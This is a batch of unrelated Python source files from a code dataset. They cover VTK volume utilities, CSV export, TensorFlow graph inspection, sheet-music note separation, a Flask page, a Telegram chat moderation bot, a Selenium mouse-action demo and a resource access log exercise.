real_to_structured_coordinates(...).',\n DeprecationWarning)\n\n return real_to_structured_coordinates(image=image,\n xmin=xmin, xmax=xmax,\n ymin=ymin, ymax=ymax,\n zmin=zmin, zmax=zmax,\n as_slice=True)\n\n\ndef extract_volume(image, xmin, xmax, ymin, ymax, zmin, zmax):\n \"\"\"\n Extract a volume from a vtkImageData\n :param image:\n :param xmin xmax ymin ymax zmin zmax:\n :return: Extracted volume vtkImageData\n \"\"\"\n min_voxel_ijk = [int()] * 3\n max_voxel_ijk = [int()] * 3\n pcoords = [float()] * 3\n\n image.ComputeStructuredCoordinates([xmin, ymin, zmin], min_voxel_ijk, pcoords)\n image.ComputeStructuredCoordinates([xmax, ymax, zmax], max_voxel_ijk, pcoords)\n\n def if_zero(value):\n if value == 0:\n return value\n else:\n return value + 1\n\n start_voxel_ijk = list(map(if_zero, min_voxel_ijk))\n extents_ijk = list(reduce(lambda i, j: i + j, list(zip(start_voxel_ijk, max_voxel_ijk))))\n\n vtk_extract_voi = vtk.vtkExtractVOI()\n if vtk.vtkVersion.GetVTKMajorVersion() < 6:\n vtk_extract_voi.SetInput(image)\n else:\n vtk_extract_voi.SetInputData(image)\n\n vtk_extract_voi.SetVOI(*extents_ijk)\n vtk_extract_voi.Update()\n\n return vtk_extract_voi.GetOutput()\n\n\ndef extractVOI(image, b0, b1, b2, b3, b4, b5):\n warnings.warn('extract_volume is deprecated; use extract_volume(...).',\n DeprecationWarning)\n\n return extract_volume(image=image, xmin=b0, xmax=b1, ymin=b2, ymax=b3, zmin=b4, zmax=b5)\n\n\ndef does_intersect_np(row1, row2):\n \"\"\" xmin, xmax, ymin, ymax, zmin, zmax\n 0 1 2 3 4 5\n \"\"\"\n intersect_volume = reduce(lambda i, j: i * j \\\n , [max(min(*vmin_vmax[1]) - max(*vmin_vmax[0]), 0) for vmin_vmax in\n [((row2[0], row1[0]), (row2[1], row1[1]))\n , ((row2[2], row1[2]), (row2[3], row1[3]))\n , ((row2[4], row1[4]), (row2[5], row1[5]))]])\n return intersect_volume > 0\n\n\ndef percent_volume_of_intersection_np(gridrow, truthrow):\n \"\"\" xmin, xmax, ymin, ymax, zmin, zmax\n 0 1 2 3 4 5\n \"\"\"\n total_volume = reduce(lambda i, j: i * j\n , [vmin_vmax1[1] - vmin_vmax1[0] for vmin_vmax1 in [(gridrow[0], gridrow[1])\n , (gridrow[2], gridrow[3])\n , (gridrow[4], gridrow[5])]])\n intersect_volume = reduce(lambda i, j: i * j\n , [max(min(*vmin_vmax2[1]) - max(*vmin_vmax2[0]), 0) for vmin_vmax2 in\n [((truthrow[0], gridrow[0]), (truthrow[1], gridrow[1]))\n , ((truthrow[2], gridrow[2]), (truthrow[3], gridrow[3]))\n , ((truthrow[4], gridrow[4]), (truthrow[5], gridrow[5]))]])\n return intersect_volume / total_volume\n\n\ndef vtp_points_to_df(input_file):\n vtp = read_vtp(input_file)\n points = []\n for i in range(vtp.GetNumberOfPoints()):\n points.append(dict(list(zip(['x', 'y', 'z'], vtp.GetPoint(i)))))\n df = pd.DataFrame(points)\n df.sort_values(['x', 'y', 'z'], inplace=True)\n return df\n\n\ndef vti_to_df(input_file):\n vtk_image_data = read_vti(input_file)\n point_data = vtk_image_data.GetPointData()\n field_data = vtk_image_data.GetFieldData()\n\n data_dict = {}\n # Add field data\n for i in range(field_data.GetNumberOfArrays()):\n array_name = field_data.GetArrayName(i)\n array = field_data.GetArray(array_name)\n if array is None:\n array = field_data.GetAbstractArray(i)\n data_dict[array_name] = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n\n # Add point data\n for i in range(point_data.GetNumberOfArrays()):\n array_name = point_data.GetArrayName(i)\n array = point_data.GetArray(array_name)\n if array is None:\n continue\n data_dict[array_name] = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n\n num_rows = max(list(map(len, iter(data_dict.values()))))\n data_dict = {k: v + [None] * (num_rows - len(v)) for (k, v) in data_dict.items()}\n\n return pd.DataFrame(data_dict)\n\n\ndef vtp_to_df(input_file):\n poly_data = read_vtp(input_file)\n field_data = poly_data.GetFieldData()\n data_dict = {}\n # Add field data\n for i in range(field_data.GetNumberOfArrays()):\n array_name = field_data.GetArrayName(i)\n array = field_data.GetArray(array_name)\n if array is None:\n array = field_data.GetAbstractArray(i)\n values_list = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n data_dict[array_name] = values_list\n\n num_rows = max(list(map(len, iter(data_dict.values()))))\n data_dict = {k: v + [None] * (num_rows - len(v)) for (k, v) in data_dict.items()}\n return pd.DataFrame(data_dict)\n\n\ndef df_to_vtp(df, output_path):\n append = vtk.vtkAppendPolyData()\n\n for index, row in df.iterrows():\n cube = vtk.vtkCubeSource()\n xcom = 0.5 * (row.xmax + row.xmin)\n ycom = 0.5 * (row.ymax + row.ymin)\n zcom = 0.5 * (row.zmax + row.zmin)\n xsize = row.xmax - row.xmin\n ysize = row.ymax - row.ymin\n zsize = row.zmax - row.zmin\n cube.SetCenter(xcom, ycom, zcom)\n cube.SetXLength(xsize)\n cube.SetYLength(ysize)\n cube.SetZLength(zsize)\n cube.Update()\n\n append.AddInput(cube.GetOutput())\n\n append.Update()\n\n writer = vtk.vtkXMLPolyDataWriter()\n writer.SetInput(append.GetOutput())\n writer.SetFileName(output_path)\n writer.Write()\n\n\ndef df_to_vti(df, column, output_filename, resample_factor=1\n , x_column='x'\n , y_column='y'\n , z_column='z'):\n \"\"\" Create a vti file from a data frame based on a column/s\n :params:\n image: vtkImageData to write\n output_filename: path to output vti file to write\n \"\"\"\n\n # Get the unique x,y,z values\n xs, ys, zs = [sorted(df[col].unique().tolist()) for col in [x_column, y_column, z_column]]\n\n # Get the number in each dimension\n nx, ny, nz = list(map(len, [xs, ys, zs]))\n\n resample_df = get_resample_index_lists(resample_factor, xs, ys, zs)\n volume_size = xs[1] - xs[0]\n resample_volume_size = (xs[1] - xs[0]) * 1.0 / resample_factor\n\n spacing = (resample_volume_size, resample_volume_size, resample_volume_size)\n origin = [i - volume_size / 2.0 for i in [xs[0], ys[0], zs[0]]]\n dimensions = [resample_factor * n for n in [nx, ny, nz]]\n\n image = create_empty_vtk_image_data(spacing, origin, dimensions)\n dims = image.GetDimensions()\n\n # Handle the case if only one column is passed in\n if isinstance(column, str):\n filter_columns = [column]\n else:\n filter_columns = column\n\n filter_image_data = {}\n for filter_name in filter_columns:\n filter_image_data[filter_name] = vtk.vtkDoubleArray()\n filter_image_data[filter_name].SetName(filter_name)\n filter_image_data[filter_name].SetNumberOfComponents(1)\n filter_image_data[filter_name].SetNumberOfTuples(image.GetNumberOfPoints())\n\n # first sort\n df_sorted = df.sort_values([x_column, y_column, z_column])\n df_sorted.dropna(subset=filter_columns, inplace=True)\n\n # convert to list\n filter_voxel_values_list = df_sorted[filter_columns].values.tolist()\n\n # for indexing in vti\n ixyz = 0\n # go through entire list\n for filter_voxel_values in filter_voxel_values_list:\n # print 'filter_voxel_values:',filter_voxel_values\n for iixyz in resample_df[resample_df.ixyz == ixyz]['iixyz_list'].values[0]:\n # they are in order\n for ifilter, filter_name in enumerate(filter_columns):\n filter_image_data[filter_name].SetValue(iixyz, filter_voxel_values[ifilter])\n ixyz += 1\n\n for filter_name in filter_columns:\n image.GetPointData().AddArray(filter_image_data[filter_name])\n\n # Write the image\n write_vti(image, output_filename)\n\n\ndef get_resample_index_lists(resample_factor\n , xs, ys, zs):\n xs.sort()\n ys.sort()\n zs.sort()\n\n nxrs = resample_factor * len(xs)\n nyrs = resample_factor * len(ys)\n nzrs = resample_factor * len(zs)\n\n ixyz = 0\n ixyz_iixyz_dict_list = []\n # for iz,z in enumerate(zs):\n for ix, x in enumerate(xs):\n for iy, y in enumerate(ys):\n # for ix,x in enumerate(xs):\n for iz, z in enumerate(zs):\n ixyz_iixyz_dict = {'ixyz': int(ixyz), 'iixyz_list': []}\n # resampling loops\n for iiz in range(iz * resample_factor, iz * resample_factor + resample_factor):\n for iiy in range(iy * resample_factor, iy * resample_factor + resample_factor):\n for iix in range(ix * resample_factor, ix * resample_factor + resample_factor):\n iixyz = iix + iiy * nxrs + iiz * nxrs * nyrs\n ixyz_iixyz_dict['iixyz_list'].append(iixyz)\n ixyz_iixyz_dict_list.append(ixyz_iixyz_dict)\n ixyz += 1\n return pd.DataFrame(ixyz_iixyz_dict_list)\n","sub_path":"vtk_util.py","file_name":"vtk_util.py","file_ext":"py","file_size_in_byte":19043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417021486","text":"#!/usr/bin/env python\nimport sys\nfrom datetime import datetime, date\n\n__all__ = ['rec2csv_neat']\n\ndef rec2csv_neat(rec, f, formatd={}, delimiter=','):\n \"\"\"rec2csv_neat is a neat version of mlab.rec2csv.\n rec: recarray to save.\n formatd: dict of formats for each fields, who's values may be format str, function, etc. For field 'datetime','date','time', '%Y%m%d...' style format can be used\"\n \"\"\"\n dtp = rec.dtype\n fieldnames = dtp.names\n formaters = {}\n for fn in fieldnames:\n if fn in formatd:\n the_fmt = formatd[fn]\n if isinstance(the_fmt, (str, unicode)):\n if isinstance(rec[fn][0], (date, datetime)) :\n formaters[fn] = lambda dt: dt.strftime(formatd[fn])\n else:\n formaters[fn] = lambda val: formatd[fn] % (val, )\n elif callable(the_fmt):\n formaters[fn] = the_fmt\n else:\n sys.stderr.write('Warning: given formater for field %s : %s is not callable. Not using.\\n' % (fn, the_fmt))\n formaters[fn] = str\n else:\n formaters[fn] = str\n if isinstance(f, (str, unicode)):\n f = open(f, 'w')\n f.write(delimiter.join(fieldnames))\n f.write('\\n')\n for i in range(len(rec)):\n try:\n to_write = [formaters[fn](rec[fn][i]) for fn in fieldnames]\n final_str = delimiter.join(to_write)\n f.write(final_str)\n f.write('\\n')\n \n except Exception as e:\n sys.stderr.write('%s\\n' % e)\n\n#if __name__ == \"__main__\":\n# from matplotlib import mlab\n# rec = mlab.csv2rec('./test.csv')\n# print rec\n# rec2csv_neat(rec, './testout.csv', formatd={'datetime':\"%Y%m%d\", 'lc':'%.3f','std':'%.9f'})\n","sub_path":"metlib/io/rec2csv_neat.py","file_name":"rec2csv_neat.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123160720","text":"import tensorflow as tf\nimport sys\nimport json\n\ndef usage(argv):\n print(\"{} \".format(argv[0]))\n\nif __name__ == \"__main__\":\n try:\n path = sys.argv[1]\n except IndexError:\n usage(sys.argv)\n sys.exit(1)\n\n # Ref: https://stackoverflow.com/questions/43517959/given-a-tensor-flow-model-graph-how-to-find-the-input-node-and-output-node-name\n gf = tf.GraphDef()\n with open(path, 'rb') as fin:\n gf.ParseFromString(fin.read())\n\n nodes = [n.name + '=>' + n.op for n in gf.node]\n nodes = json.dumps(nodes, indent=4)\n\n nodes_io = [n.name + '=>' + n.op for n in gf.node if n.op in ('Placeholder') or n.name in ('embeddings')]\n nodes_io = json.dumps(nodes_io, indent=4)\n\n print(\"All nodes:\")\n print(nodes)\n\n print(\"IO nodes:\")\n print(nodes_io)\n\n # Another way: first import the model to the current graph,\n # Then inspect the ops and tensors from the current graph\n # Ref: https://www.tensorflow.org/guide/graphs\n tf.import_graph_def(gf, name=\"\")\n g = tf.get_default_graph()\n ops=g.get_operations()\n ops=[op.name for op in ops]\n ops=json.dumps(ops, indent=4)\n print(\"Ops:\")\n print(ops)","sub_path":"misc/inspect_model.py","file_name":"inspect_model.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224040433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 12:24:34 2021\n\n@author: fritz\n\"\"\"\n\n'''IMPORTANT directories beginning with '_' are not gonna be processed '''\n\nfrom PIL import Image\nimport numpy as np\nimport sys, os, shutil\nimport Union_and_Find\n\nthresh = 140\nfn = lambda x : 255 if x > thresh else 0\n\namount_black_pixel_deviation = 1.4\ntresh_delete_noise_of_marked_cols = 0.00\nseperate_width = 1/10 #per cent of the line width\n\ndir_to_save = \"separated_notes\"\ndir_to_open = \"groups_to_separate\"\n\ndef main(): \n for dirName, subdirList, fileList in os.walk(dir_to_open):\n split = dirName.split('/')\n \n if len(split) > 2:\n \n test_name = split[1]\n line_name = split[2] \n out_dir = \"{}/{}/{}\".format(dir_to_save, test_name, line_name)\n \n for fName in fileList:\n fName.strip()\n\n if test_name[0] == '_':\n continue\n \n print(dirName, fName)\n img = Image.open(\"{}/{}\".format(dirName,fName))\n np_img = np.asarray(img)\n img = img.convert('L').point(fn, mode='1')\n\n len_width = np_img.shape[1]\n len_height = np_img.shape[0]\n \n global tresh_pixel_to_separate\n tresh_pixel_to_separate = int (len_width * seperate_width)\n \n col_index = 0\n counter = 0 \n number_of_cols = 10\n \n amount_black_pixel_array = np.zeros(number_of_cols, dtype=int)\n \n while amount_black_pixel_array[number_of_cols-1] == 0:\n col = np_img[:, col_index].tolist()\n spaces_between_lines, amount_black_pixel = calc_spaces_between_lines(col)\n \n if is_matching_pattern(spaces_between_lines):\n amount_black_pixel_array[counter] = amount_black_pixel\n counter += 1 \n \n col_index += 1\n \n\n amount_black_pixel = int(amount_black_pixel_array.mean())\n \n marked_cols = mark_col_true_if_is_on_a_note(amount_black_pixel, np_img, len_width, len_height)\n\n #distribution = calc_distribution_of_amount_of_related_black_pixel(marked_cols)\n #marked_cols = delete_noise_of_marked_cols(marked_cols, distribution)\n \n notes = create_list_of_notes(marked_cols)\n\n convert_notes_to_images(notes, out_dir, fName, np_img)\n\n\ndef calc_spaces_between_lines(col):\n is_between_to_lines = False\n is_prev_black = False\n \n spaces_between_lines = []\n \n pixel_between_lines = 0\n amout_black_pixel = 0\n \n for pixel in col:\n if is_between_to_lines and isWhite(pixel):\n pixel_between_lines += 1\n \n elif is_between_to_lines and isBlack(pixel) and not is_prev_black:\n amout_black_pixel += 1\n spaces_between_lines.append(pixel_between_lines)\n is_prev_black = True\n is_between_to_lines = False\n pixel_between_lines = 0\n \n elif is_prev_black and isWhite(pixel):\n is_prev_black = False\n is_between_to_lines = True \n \n pixel_between_lines += 1\n \n elif isBlack(pixel):\n is_prev_black = True\n amout_black_pixel += 1\n \n return spaces_between_lines, amout_black_pixel\n\n\ndef is_matching_pattern(spaces_between_lines):\n spaces_between_lines = np.asarray(spaces_between_lines)\n \n len_spaces_between_lines = len(spaces_between_lines) \n \n if len_spaces_between_lines == 0:\n return False \n \n union_and_find = Union_and_Find.Union_and_Find(spaces_between_lines, 3)\n union_and_find.calc_eq_classes()\n union_and_find.sort_eq_classes_by_members_descending()\n \n biggest = union_and_find.eq_classes.pop(0)\n \n nr_of_lines = (len_spaces_between_lines + 1) / 5\n \n len_matches = nr_of_lines == int(nr_of_lines)\n \n if biggest.amount_of_members % 4 == 0 and len_matches:\n return True\n else: \n return False\n\n \ndef isBlack(pixel):\n if pixel == True:\n return False \n else:\n return True\n \n \ndef isWhite(pixel):\n return not isBlack(pixel)\n\ndef calc_amount_black_pixel_in_col(col):\n amount_black_pixel = 0\n \n for pixel in col:\n if isBlack(pixel):\n amount_black_pixel += 1\n \n return amount_black_pixel\n \n\ndef mark_col_true_if_is_on_a_note(amount_black_pixel, np_img, len_width, len_height):\n #marked_cols = np.empty(len_width,dtype=bool)\n marked_cols = []\n \n for i in range(0, len_width):\n col = np_img[:,i].tolist()\n amount_black_pixel_in_col = calc_amount_black_pixel_in_col(col)\n \n upper_bound = amount_black_pixel + amount_black_pixel * amount_black_pixel_deviation\n \n if amount_black_pixel_in_col > upper_bound:\n marked_cols.append(True)\n else:\n marked_cols.append(False)\n\n \n\n return marked_cols\n\ndef create_list_of_notes(marked_cols):\n is_on_a_note = False\n dist_to_prev_note = sys.maxsize\n \n notes = []\n index = 0;\n for col in marked_cols:\n if is_note_col(col) and dist_to_prev_note > tresh_pixel_to_separate and not is_on_a_note:\n #TODO : setting index to 0 if index - tresh_pixel_to_separate < 0 might cause problems\n index_lower = max(0, index - tresh_pixel_to_separate)\n note = [index_lower]\n \n dist_to_prev_note = 1\n is_on_a_note = True \n \n elif not is_note_col(col) and dist_to_prev_note > tresh_pixel_to_separate and is_on_a_note:\n note.append(index)\n notes.append(note)\n \n is_on_a_note = False\n dist_to_prev_note += 1\n \n elif not is_note_col(col) and dist_to_prev_note <= tresh_pixel_to_separate and is_on_a_note:\n dist_to_prev_note += 1\n \n elif is_note_col(col):\n dist_to_prev_note = 1 \n \n else:\n dist_to_prev_note += 1\n \n \n index += 1\n \n if is_on_a_note:\n notes.append([index_lower, index - 1])\n \n return notes\n\ndef is_note_col(col):\n if col == True:\n return True\n else:\n return False\n \ndef convert_notes_to_images(notes, out_dir, fName, np_img):\n index = 0\n fName = fName[:-4]\n for note in notes:\n note_matrix = np_img[:, note[0]:note[1]]\n note_img = Image.fromarray(note_matrix)\n note_img.save(\"{}/{}_{}.png\".format(out_dir, fName, index))\n index += 1\n \n\ndef calc_distribution_of_amount_of_related_black_pixel(marked_cols):\n is_prev_note_col = False\n actual_amount = 0\n \n distribution = []\n \n index_start = 0\n \n index = 0\n for col in marked_cols:\n \n if is_note_col(col) and is_prev_note_col == False:\n index_start = index\n is_prev_note_col = True\n actual_amount += 1\n \n if not is_note_col(col) and is_prev_note_col == True:\n distribution.append((actual_amount, index_start))\n actual_amount = 0 \n is_prev_note_col = False\n \n if is_note_col(col) and is_prev_note_col == True:\n actual_amount += 1\n \n index += 1\n \n return distribution\n\ndef delete_noise_of_marked_cols(marked_cols, distribution):\n np_marked_cols = np.array(marked_cols)\n sorted_distribution = sorted(distribution, key=lambda x: x[0])\n max_pixel = sorted_distribution.pop()[0]\n \n tresh = int(tresh_delete_noise_of_marked_cols * max_pixel) + 1\n \n to_delete = [] \n \n for actual in sorted_distribution:\n if actual[0] < tresh:\n to_delete.append(actual) \n else: \n break\n\n \n for actual in to_delete:\n index_start = actual[1]\n index_stop = actual[1] + actual[0]\n for i in range(index_start, index_stop):\n np_marked_cols[i] = False \n \n \n return np_marked_cols.tolist()\n \nif __name__==\"__main__\": \n main() \n\n","sub_path":"object_detection/separate_groups_of_notes.py","file_name":"separate_groups_of_notes.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221961414","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, url_for\nfrom scrollofsheep import tracker\n\napp = Flask(__name__)\ntemplate = 'default.html'\n\n@app.route('/')\ndef main():\n t = tracker.web_track()\n device_data = t.item_data()\n return render_template(template, device_data=device_data)\n\nif __name__ == '__main__':\n app.run()","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223640042","text":"# coding=utf-8\nimport time\nimport random\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot(\"token\")\n\nprint(\"Бот запущен\\nСоедениние\")\nbot.send_message(-1001160331786, \"Бот запущен\")\n\n@bot.message_handler(content_types=[\"new_chat_members\"])\ndef default_test(message):\n bot.send_message(message.chat.id, \"Привет! Обязательно прочитай [правила](https://t.me/animedev/101159).\", parse_mode='Markdown')\n\n@bot.message_handler(commands=[\"banme\"])\ndef default_tesdt(message):\n if bot.get_chat_member(message.chat.id, message.from_user.id).status == \"member\":\n rand = random.randint(100, 1000)\n bot.send_message(message.chat.id,\n \"[{0}](tg://user?id={1}) \".format(message.from_user.first_name, message.from_user.id)\n + \"СОЖЖЕН. По собственному желанию.\" + \"\\nНа \" + str(rand) + \" сек.\",\n parse_mode='Markdown')\n bot.restrict_chat_member(message.chat.id, message.from_user.id, int(time.time() + rand),\n can_send_messages=False)\n else:\n bot.reply_to(message,\n \"[{0}](tg://user?id={1}) \".format(message.from_user.first_name, message.from_user.id)\n + \"Извините, вы администратор чата.\\nИли уже забанены.\",\n parse_mode='Markdown')\n\n@bot.message_handler(commands = [\"mute\"])\ndef mute(msg):\n try:\n if bot.get_chat_member(msg.chat.id, msg.from_user.id).status != \"member\":\n if bot.get_chat_member(msg.chat.id, msg.reply_to_message.from_user.id).status == \"member\":\n if msg.reply_to_message is not None:\n if 1 < len(msg.text.split(\" \")) < 3:\n bantime = int(\" \".join(msg.text.split(' ')[1:]))\n if bantime > 30 and bantime < 9999999:\n bot.send_message(msg.chat.id, \"[{0}](tg://user?id={1}) \"\n .format(msg.reply_to_message.from_user.first_name,\n msg.reply_to_message.from_user.id, ) +\n \"Забанен на \" + str(bantime) + \" сек \",\n parse_mode='Markdown')\n bot.restrict_chat_member(msg.chat.id, msg.reply_to_message.from_user.id,\n int(time.time() + bantime),\n can_send_messages=False)\n else:\n bot.send_message(msg.chat.id,\n \"Число \" + str(\n bantime) + \" слишком большое или маленькое.\\nДиапозон 30-9999999\")\n else:\n bot.send_message(msg.chat.id, \"Некоректное время\")\n else:\n bot.send_message(msg.chat.id, \"Используй только реплаем!\")\n else:\n bot.send_message(msg.chat.id, \"Пользователь является администратором\")\n else:\n bot.send_message(msg.chat.id, \"Вы не администратор чата.\")\n except ValueError:\n bot.send_message(msg.chat.id, \"Некоректное время бана\")\n\n\n@bot.message_handler(commands = [\"stop\"])\ndef stop(msg):\n bot.send_message(-1001160331786, \"Бот отключен\")\n\nif __name__ == '__main__':\n bot.polling(none_stop=True, timeout=120)\n","sub_path":"animedev.py","file_name":"animedev.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21038393","text":"#开发者:一只小菜鸟\n#2020/7/15 0:36\n#导入模块\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n#创建浏览器驱动对象\ndriver = webdriver.Chrome(\"D:\\\\ruanjian\\chromedriver\\chromedriver.exe\")\n#访问网址\ndriver.get(\"https://www.baidu.com/\")\nele = driver.find_element_by_name(\"tj_briicon\")\n#对定位的元素进行悬停操作\nActionChains(driver).move_to_element(ele).perform()\n#对定位的元素进行右键操作\nActionChains(driver).context_click(ele).perform()\n#双击\nActionChains(driver).double_click(ele).perform()\n\n#访问网址\ndriver.get(\"D:\\github\\Project\\\\test\\selenium_class\\day4\\\\test2.html\")\n#定位要拖动的元素\nele1 = driver.find_element_by_id(\"blackSquare\")\n#定位到目标元素\nele2 = driver.find_element_by_id(\"targetEle\")\n\nActionChains(driver).drag_and_drop(ele1,ele2).perform()","sub_path":"test/selenium_class/day4/3鼠标事件.py","file_name":"3鼠标事件.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410468165","text":"logs1 = [\n[\"58523\", \"user_1\", \"resource_1\"],\n[\"62314\", \"user_2\", \"resource_2\"],\n[\"54001\", \"user_1\", \"resource_3\"],\n[\"200\", \"user_6\", \"resource_5\"],\n[\"215\", \"user_6\", \"resource_4\"],\n[\"54060\", \"user_2\", \"resource_3\"],\n[\"53760\", \"user_3\", \"resource_3\"],\n[\"58522\", \"user_22\", \"resource_1\"],\n[\"53651\", \"user_5\", \"resource_3\"],\n[\"2\", \"user_6\", \"resource_1\"],\n[\"100\", \"user_6\", \"resource_6\"],\n[\"400\", \"user_7\", \"resource_2\"],\n[\"100\", \"user_8\", \"resource_6\"],\n[\"54359\", \"user_1\", \"resource_3\"],\n]\n\nlogs2 = [\n[\"300\", \"user_1\", \"resource_3\"],\n[\"599\", \"user_1\", \"resource_3\"],\n[\"900\", \"user_1\", \"resource_3\"],\n[\"1199\", \"user_1\", \"resource_3\"],\n[\"1200\", \"user_1\", \"resource_3\"],\n[\"1201\", \"user_1\", \"resource_3\"],\n[\"1202\", \"user_1\", \"resource_3\"]\n]\n\nimport collections \n# question 1\ndef getUserMaxMinAccessTime(logs):\n dctUser2Time = dict()\n for time, user, resource in logs:\n if user not in dctUser2Time:\n dctUser2Time[user] = [2**32, -2*32] # [min, max]\n dctUser2Time[user][0] = min(dctUser2Time[user][0], int(time))\n dctUser2Time[user][1] = max(dctUser2Time[user][1], int(time))\n return dctUser2Time\n# print(getUserMaxMinAccessTime(logs1))\n\n# question 2\ndef getHighestAccessedResource(logs):\n dctResource2Freq = collections.defaultdict(int)\n time2resource = [(int(time), resource) for time, _, resource in logs]\n time2resource.sort(key = lambda x: x[0])\n # print(time2resource)\n left, right = 0, 0\n max_accessed_resource = ''\n max_freq = 0\n while right < len(time2resource):\n while time2resource[right][0] - time2resource[left][0] <= 300:\n enter_r = time2resource[right][1]\n dctResource2Freq[enter_r] += 1\n # print('***', enter_r, dctResource2Freq)\n if dctResource2Freq[enter_r] > max_freq:\n max_freq = dctResource2Freq[enter_r]\n max_accessed_resource = enter_r\n right += 1\n if right == len(time2resource):\n break\n exit_r = time2resource[left][1]\n dctResource2Freq[exit_r] -= 1\n left += 1\n return max_accessed_resource, max_freq\nprint(getHighestAccessedResource(logs1))\n\n# question 3\ndef getTransitionGraph(logs):\n dctUser2TimeResource = collections.defaultdict(list)\n for time, user, resource in logs:\n dctUser2TimeResource[user].append((int(time), resource))\n\n dctResource2Next = collections.defaultdict(list)\n for user, time_resource in dctUser2TimeResource.items():\n time_resource.sort(key = lambda x: x[0])\n cur_resource = 'START'\n for i in range(len(time_resource)):\n next_resource = time_resource[i][1]\n dctResource2Next[cur_resource].append(next_resource)\n cur_resource = next_resource\n dctResource2Next[cur_resource].append('END')\n # print(dctResource2Next)\n \n dctGraph = collections.defaultdict(list)\n for key, lstResource in dctResource2Next.items():\n for r in set(lstResource):\n prob = lstResource.count(r) / float(len(lstResource))\n prob = round(prob, 3)\n dctGraph[key].append((r, prob))\n return dctGraph\n\nprint(getTransitionGraph(logs1))\n\n\"\"\"\n第二题: Resource Access Log\nSuppose we have an unsorted log file of accesses to web resources. \nEach log entry consists of an access time, the ID of the user making the access, and the resource ID.\nThe access time is represented as seconds since 00:00:00, and all times are assumed to be in the same day.\nFor example:\nlogs1 = [\n[\"58523\", \"user_1\", \"resource_1\"],\n[\"62314\", \"user_2\", \"resource_2\"],\n[\"54001\", \"user_1\", \"resource_3\"],\n[\"200\", \"user_6\", \"resource_5\"],\n[\"215\", \"user_6\", \"resource_4\"],\n[\"54060\", \"user_2\", \"resource_3\"],\n[\"53760\", \"user_3\", \"resource_3\"],\n[\"58522\", \"user_22\", \"resource_1\"],\n[\"53651\", \"user_5\", \"resource_3\"],\n[\"2\", \"user_6\", \"resource_1\"],\n[\"100\", \"user_6\", \"resource_6\"],\n[\"400\", \"user_7\", \"resource_2\"],\n[\"100\", \"user_8\", \"resource_6\"],\n[\"54359\", \"user_1\", \"resource_3\"],\n]\nExample 2:\nlogs2 = [\n[\"300\", \"user_1\", \"resource_3\"],\n[\"599\", \"user_1\", \"resource_3\"],\n[\"900\", \"user_1\", \"resource_3\"],\n[\"1199\", \"user_1\", \"resource_3\"],\n[\"1200\", \"user_1\", \"resource_3\"],\n[\"1201\", \"user_1\", \"resource_3\"],\n[\"1202\", \"user_1\", \"resource_3\"]\n]\nQuestion 1 - Write a function that takes the logs and returns each users min and max access timestamp\nExample Output:\nuser_3:[53760,53760]\nuser_2:[54060,62314]\nuser_1:[54001,58523]\nuser_7:[400,400]\nuser_6:[2,215]\nuser_5:[53651,53651]\nuser_4:[58522,58522]\nuser_8:[100,100]\n*/\n\n第二题 FollowUp:\n/*\nQuestion 2 - Write a function that takes the logs and returns the resource with the highest number of accesses \nin any 5 minute window, together with how many accesses it saw.\nExpected Output:\nmost_requested_resource(logs1) # => ('resource_3', 3) \n\n第二题 Follow Up Question 3 -\nWrite a function that takes the logs as input, builds the transition graph and returns it as an adjacency \nlist with probabilities. Add START and END states. \nSpecifically, for each resource, we want to compute a list of every possible next step taken by any user, \ntogether with the corresponding probabilities. The list of resources should include START but not END, \nsince by definition END is a terminal state.\n\nExpected output for logs1:\ntransition_graph(logs1) # =>\n{{\n'START': {'resource_1': 0.25, 'resource_2': 0.125, 'resource_3': 0.5, 'resource_6': 0.125},\n'resource_1': {'resource_6': 0.333, 'END': 0.667},\n'resource_2': {'END': 1.0},\n'resource_3': {'END': 0.4, 'resource_1': 0.2, 'resource_2': 0.2, 'resource_3': 0.2},\n'resource_4': {'END': 1.0},\n'resource_5': {'resource_4': 1.0},\n'resource_6': {'END': 0.5, 'resource_5': 0.5}\n}}\nFor example, of 8 total users, 4 users have resource_3 as a first visit (user_1, user_2, user_3, user_5), \n2 users have resource_1 as a first visit (user_6, user_22), \n1 user has resource_2 as a first visit (user_7), and 1 user has resource_6 (user_8) \nso the possible next steps for START are resource_3 with probability 4/8, resource_1 with probability 2/8, \nand resource_2 and resource_6 with probability 1/8.\nThese are the resource paths per user for the first logs example, ordered by access time:\n{{\n'user_1': ['resource_3', 'resource_3', 'resource_1'],\n'user_2': ['resource_3', 'resource_2'],\n'user_3': ['resource_3'],\n'user_5': ['resource_3'],\n'user_6': ['resource_1', 'resource_6', 'resource_5', 'resource_4'],\n'user_7': ['resource_2'],\n'user_8': ['resource_6'],\n'user_22': ['resource_1'],\n}}\nEx‍‍‍‍‌‌‍‌‍‍‍‌‌‍‍‍pected output for logs2:\ntransition_graph(logs2) # =>\n{{\n'START': {'resource_3': 1.0},\n'resource_3': {'resource_3: 0.857, 'END': 0.143}\n}\n\"\"\"","sub_path":"OutOfBag/Robinhood/resource_access_log.py","file_name":"resource_access_log.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125807475","text":"from contextlib import 